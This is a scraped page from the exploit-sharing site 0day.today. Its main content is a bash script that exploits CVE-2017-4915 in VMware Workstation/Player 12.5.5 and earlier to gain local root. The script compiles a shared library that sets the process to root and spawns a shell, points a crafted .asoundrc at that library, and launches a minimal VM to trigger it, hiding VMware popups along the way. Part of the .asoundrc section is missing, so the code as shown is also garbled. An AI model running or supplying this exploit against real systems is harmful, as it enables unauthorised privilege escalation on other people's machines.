0day.today - Biggest Exploit Database in the World.
![](/img/logo_green.jpg)
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earnGOLD
Administration of this site uses the official contacts. Beware of impostors!
![We DO NOT use Telegram or any messengers / social networks!](/img/no_telegram_big.png)
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
VMware Workstation / Player < 12.5.5 - Local Privilege Escalation Exploit
Author
Risk
![](/img/risk/critlow_3.gif)
Security Risk High
]0day-ID
Category
Date add
CVE
Platform
#!/bin/bash ################################################################################ # VMware Workstation Local Privilege Escalation exploit (CVE-2017-4915) # # - https://www.vmware.com/security/advisories/VMSA-2017-0009.html # # - https://www.exploit-db.com/exploits/42045/ # # # # Affects: # # - VMware Workstation Player <= 12.5.5 # # - VMware Workstation Pro <= 12.5.5 # ################################################################################ # ~ bcoles VM_PLAYER=/usr/bin/vmplayer GCC=/usr/bin/gcc RAND_STR=$(echo $RANDOM | tr '[0-9]' '[a-zA-Z]') VM_DIR=$HOME/.$RAND_STR echo "[*] Creating directory $VM_DIR" mkdir "$VM_DIR" if [ $? -ne 0 ] ; then echo "[-] Could not create $VM_DIR" exit 1 fi echo "[*] Writing $VM_DIR/$RAND_STR.c" cat > "$VM_DIR/$RAND_STR.c" <<EOL #define _GNU_SOURCE #include <stdlib.h> #include <string.h> #include <stdio.h> #include <unistd.h> #include <fcntl.h> #include <sys/prctl.h> #include <err.h> extern char *program_invocation_short_name; __attribute__((constructor)) void run(void) { uid_t ruid, euid, suid; if (getresuid(&ruid, &euid, &suid)) err(1, "getresuid"); printf("[*] Current UIDs: %d %d %d\n", ruid, euid, suid); if (ruid == 0 || euid == 0 || suid == 0) { if (setresuid(0, 0, 0) || setresgid(0, 0, 0)) err(1, "setresxid"); printf("switched to root UID and GID"); system("/bin/bash"); _exit(0); } } EOL echo "[*] Compiling $VM_DIR/$RAND_STR.c" $GCC -shared -o "$VM_DIR/$RAND_STR.so" "$VM_DIR/$RAND_STR.c" -fPIC -Wall -ldl -std=gnu99 if [ $? -ne 0 ] ; then echo "[-] Compilation failed" exit 1 fi echo "[*] Removing $VM_DIR/$RAND_STR.c" rm "$VM_DIR/$RAND_STR.c" echo "[*] Writing $HOME/.asoundrc" lib "$VM_DIR/$RAND_STR.so" func "conf_pulse_hook_load_if_running" } EOL echo "[*] Writing $VM_DIR/$RAND_STR.vmx" cat > "$VM_DIR/$RAND_STR.vmx" <<EOL .encoding = "UTF-8" config.version = "8" virtualHW.version = "8" scsi0.present = "FALSE" memsize = "4" ide0:0.present = "FALSE" sound.present = "TRUE" sound.fileName = "-1" sound.autodetect = "TRUE" vmci0.present = "FALSE" hpet0.present = "FALSE" displayName = "$RAND_STR" guestOS = "other" nvram = "$RAND_STR.nvram" virtualHW.productCompatibility = "hosted" gui.exitOnCLIHLT = "FALSE" powerType.powerOff = "soft" powerType.powerOn = "soft" powerType.suspend = "soft" powerType.reset = "soft" floppy0.present = "FALSE" monitor_control.disable_longmode = 1 EOL echo "[*] Disabling VMware hint popups" if [ ! -d "$HOME/.vmware" ]; then mkdir "$HOME/.vmware" fi if [ -f "$HOME/.vmware/preferences" ]; then if grep -qi "hints.hideall" "$HOME/.vmware/preferences"; then sed -i 's/hints\.hideAll\s*=\s*"FALSE"/hints.hideAll = "TRUE"/i' "$HOME/.vmware/preferences" else echo 'hints.hideAll = "TRUE"' >> "$HOME/.vmware/preferences" fi else echo '.encoding = "UTF8"' > "$HOME/.vmware/preferences" echo 'pref.vmplayer.firstRunDismissedVersion = "999"' >> "$HOME/.vmware/preferences" echo 'hints.hideAll = "TRUE"' >> "$HOME/.vmware/preferences" fi echo "[*] Launching VMware Player..." $VM_PLAYER "$VM_DIR/$RAND_STR.vmx" echo "[*] Removing $HOME/.asoundrc" rm "$HOME/.asoundrc" echo "[!] Remove $VM_DIR when you're done" rmdir "$VM_DIR" ################################################################################ # EOF # 0day.today [2024-07-02] #